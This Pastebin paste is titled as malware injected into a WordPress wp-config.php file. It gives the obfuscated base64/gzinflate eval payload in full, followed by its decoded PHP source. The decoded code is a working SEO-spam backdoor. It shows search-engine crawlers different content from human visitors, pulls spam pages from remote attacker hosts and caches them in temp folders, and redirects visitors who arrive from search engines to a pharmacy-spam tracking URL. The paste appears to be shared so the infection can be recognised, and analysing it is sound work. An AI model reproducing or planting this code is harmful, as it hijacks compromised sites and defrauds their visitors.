daily pastebin goal
10%
SHARE
TWEET

Malware - injected in wp-config.php file

scurit Sep 25th, 2014 276 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php eval(gzinflate(base64_decode('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')));?>
  2.  
  3. -----------------------------
  4. Decodes to:
  5. -------------------------------
  6.  
  7. <?php if (!defined('frmDs')) {
  8.     define('frmDs', 1);
  9.     error_reporting(0);
  10.     function frm_dl($url) {
  11.         if (function_exists('curl_init')) {
  12.             $ch = curl_init($url);
  13.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  14.             $out = curl_exec($ch);
  15.             if (curl_errno($ch) !== 0) $out = false;
  16.             curl_close($ch);
  17.         } else {
  18.             $out = @file_get_contents($url);
  19.         }
  20.         return trim($out);
  21.     }
  22.     function frm_crpt($in) {
  23.         $il = strlen($in);
  24.         $o = '';
  25.         for ($i = 0;$i < $il;$i++) $o.= $in[$i] ^ '*';
  26.         return $o;
  27.     }
  28.     function frm_getcache($tmpdir, $link, $cmtime, $toe = false) {
  29.         $f = $tmpdir . '/sess_' . md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
  30.         $fe = file_exists($f);
  31.         if (!$fe || time() - filemtime($f) > 60 * $cmtime) {
  32.             $dlc = frm_dl($link);
  33.             if ($fe && $dlc === false) @touch($f);
  34.             else {
  35.                 if ($fe && empty($dlc) && $toe) {
  36.                     @touch($f);
  37.                 } else {
  38.                     if ($fp = @fopen($f, 'w')) {
  39.                         fwrite($fp, frm_crpt($dlc));
  40.                         fclose($fp);
  41.                     } else {
  42.                         return $dlc;
  43.                     }
  44.                 }
  45.             }
  46.         }
  47.         $fc = @file_get_contents($f);
  48.         return ($fc) ? frm_crpt($fc) : '';
  49.     }
  50.     function frm_isbot() {
  51.         $ua = @strtolower($_SERVER['HTTP_USER_AGENT']);
  52.         if (($lip = ip2long($_SERVER['REMOTE_ADDR'])) < 0) $lip+= 4294967296;
  53.         $rs = array(array(3639549953, 3639558142), array(1089052673, 1089060862), array(1123635201, 1123639294), array(1208926209, 1208942590), array(3512041473, 3512074238), array(1113980929, 1113985022), array(1249705985, 1249771518), array(1074921473, 1074925566), array(3481178113, 3481182206), array(2915172353, 2915237886), array(2850291712, 2850357247));
  54.         foreach ($rs as $r) if ($lip >= $r[0] && $lip <= $r[1]) return true;
  55.         if (!$ua) return true;
  56.         $bots = array('googlebot', 'bingbot', 'slurp', 'msnbot', 'jeeves', 'teoma', 'crawler', 'spider');
  57.         foreach ($bots as $b) if (strpos($ua, $b) !== false) return true;
  58.         $h = @gethostbyaddr($_SERVER['REMOTE_ADDR']);
  59.         $hba = array('google', 'msn', 'yahoo');
  60.         if ($h) foreach ($hba as $hb) if (strpos($h, $hb) !== false) return true;
  61.         return false;
  62.     }
  63.     function frm_tmpdir() {
  64.         $fs = array('/tmp', '/var/tmp', './wp-content/cache', './wp-content/uploads', './tmp', './cache', './images');
  65.         foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
  66.             if ($t = getenv($v)) {
  67.                 $fs[] = $t;
  68.             }
  69.         }
  70.         if (function_exists('sys_get_temp_dir')) {
  71.             $fs[] = sys_get_temp_dir();
  72.         }
  73.         $fs[] = '.';
  74.         foreach ($fs as $f) {
  75.             $tf = $f . '/' . md5(rand());
  76.             if ($fp = @fopen($tf, 'w')) {
  77.                 fclose($fp);
  78.                 unlink($tf);
  79.                 return $f;
  80.             }
  81.         }
  82.         return false;
  83.     }
  84.     function frm_seref() {
  85.         $r = @strtolower($_SERVER["HTTP_REFERER"]);
  86.         $ses = array('google', 'bing', 'yahoo', 'ask', 'aol');
  87.         foreach ($ses as $se) if (strpos($r, $se . '.') != false) return true;
  88.         return false;
  89.     }
  90.     function frm_havekey($s = false) {
  91.         $nks = explode('|', 'abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
  92.         $k = ($s == false) ? @strtolower($_SERVER["HTTP_REFERER"] . $_SERVER["REQUEST_URI"]) : $s;
  93.         if (strpos($k, "site%3A") !== false || strpos($k, "inurl%3A") !== false) return '';
  94.         foreach ($nks as $n) if (preg_match("/(|_)$n(|_)/", $k)) return $n;
  95.         return '';
  96.     }
  97.     function frm_strtonum($Str, $Check, $Magic) {
  98.         $Int32Unit = 4294967296;
  99.         $length = strlen($Str);
  100.         for ($i = 0;$i < $length;$i++) {
  101.             $Check*= $Magic;
  102.             if ($Check >= $Int32Unit) {
  103.                 $Check = ($Check - $Int32Unit * (int)($Check / $Int32Unit));
  104.                 $Check = ($Check < - 2147483648) ? ($Check + $Int32Unit) : $Check;
  105.             }
  106.             $Check+= ord($Str{$i});
  107.         }
  108.         return $Check;
  109.     }
  110.     function frm_chhash($String) {
  111.         $Check1 = frm_strtonum($String, 0x1505, 0x21);
  112.         $Check2 = frm_strtonum($String, 0, 0x1003F);
  113.         $Check1 >>= 2;
  114.         $Check1 = (($Check1 >> 4) & 0x3FFFFC0) | ($Check1 & 0x3F);
  115.         $Check1 = (($Check1 >> 4) & 0x3FFC00) | ($Check1 & 0x3FF);
  116.         $Check1 = (($Check1 >> 4) & 0x3C000) | ($Check1 & 0x3FFF);
  117.         $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) << 2) | ($Check2 & 0xF0F);
  118.         $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000);
  119.         $Hashnum = ($T1 | $T2);
  120.         $CheckByte = 0;
  121.         $Flag = 0;
  122.         $HashStr = sprintf('%u', $Hashnum);
  123.         $length = strlen($HashStr);
  124.         for ($i = $length - 1;$i >= 0;$i--) {
  125.             $Re = $HashStr{$i};
  126.             if (1 === ($Flag % 2)) {
  127.                 $Re+= $Re;
  128.                 $Re = (int)($Re / 10) + ($Re % 10);
  129.             }
  130.             $CheckByte+= $Re;
  131.             $Flag++;
  132.         }
  133.         $CheckByte%= 10;
  134.         if (0 !== $CheckByte) {
  135.             $CheckByte = 10 - $CheckByte;
  136.             if (1 === ($Flag % 2)) {
  137.                 if (1 === ($CheckByte % 2)) {
  138.                     $CheckByte+= 9;
  139.                 }
  140.                 $CheckByte >>= 1;
  141.             }
  142.         }
  143.         return '7' . $CheckByte . $HashStr;
  144.     }
  145.     function frm_chpr($url, $td) {
  146.         $ch = frm_chhash($url);
  147.         $res = frm_getcache($td, "http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url", 60 * 24 * 7);
  148.         if (($pos = strpos($res, "Rank_")) !== false) return substr($res, 9, 1);
  149.     }
  150.     function frm_red($k) {
  151.         if (!frm_isbot() && frm_seref()) {
  152.             $r = @urlencode($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
  153.             $s = @urlencode($_SERVER['HTTP_REFERER']);
  154.             die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
  155.         }
  156.     }
  157.     $tdir = frm_tmpdir();
  158.     $isb = frm_isbot();
  159.     $k = frm_havekey();
  160.     $host = preg_replace('/^w{3}\./', '', strtolower($_SERVER['HTTP_HOST']));
  161.     if ($cv = @$_POST[md5($host . 'ch') ]) {
  162.         exit($cv);
  163.     }
  164.     if ($tdir && strlen($host) < 100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)) {
  165.         $parg = substr(preg_replace('/[^a-z]+/', '', strtolower(base64_encode(md5($host . 'p1')))), 0, 3);
  166.         $sp = "http://eylrgwfxkhb.rr.nu/stat/feed.php?pa=$parg&h=$host";
  167.         //
  168.         $tp = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  169.         if ($isb && ($ppr = frm_chpr($tp)) > 1) {
  170.             $pc = frm_getcache($tdir, $sp . "&a=l&p=" . urlencode($tp) . "&pr=$ppr", 60 * 24);
  171.             if ($pc) die($pc);
  172.         }
  173.         //
  174.         $ruri = strtolower($_SERVER['REQUEST_URI']);
  175.         $pageid = (isset($_GET[$parg])) ? $_GET[$parg] * 1 : 0;
  176.         if ((strpos($ruri, '/?') === 0 || strpos($ruri, '/index.php?') === 0) && $pageid > 0) {
  177.             frm_red($k);
  178.             die(frm_getcache($tdir, $sp . "&p=$pageid", 60 * 24, true));
  179.         }
  180.         if (($ruri == '/' || $ruri == '/index.php') && $isb) {
  181.             $c = frm_getcache($tdir, $sp, 60 * 24);
  182.             if ($c) die($c);
  183.         }
  184.         //
  185.         if ($k && $sdl = frm_getcache($tdir, $sp . "&a=s", ($isb ? 30 : 60 * 24 * 7), true)) {
  186.             if (strpos($sdl, '|' . $ruri . '|') !== false) {
  187.                 frm_red($k);
  188.                 die(frm_getcache($tdir, $sp . "&a=s&p=" . urlencode($ruri), 60 * 24 * 7, true));
  189.             }
  190.         }
  191.     }
  192.     if ($k) frm_red($k);
  193. }
RAW Paste Data
Top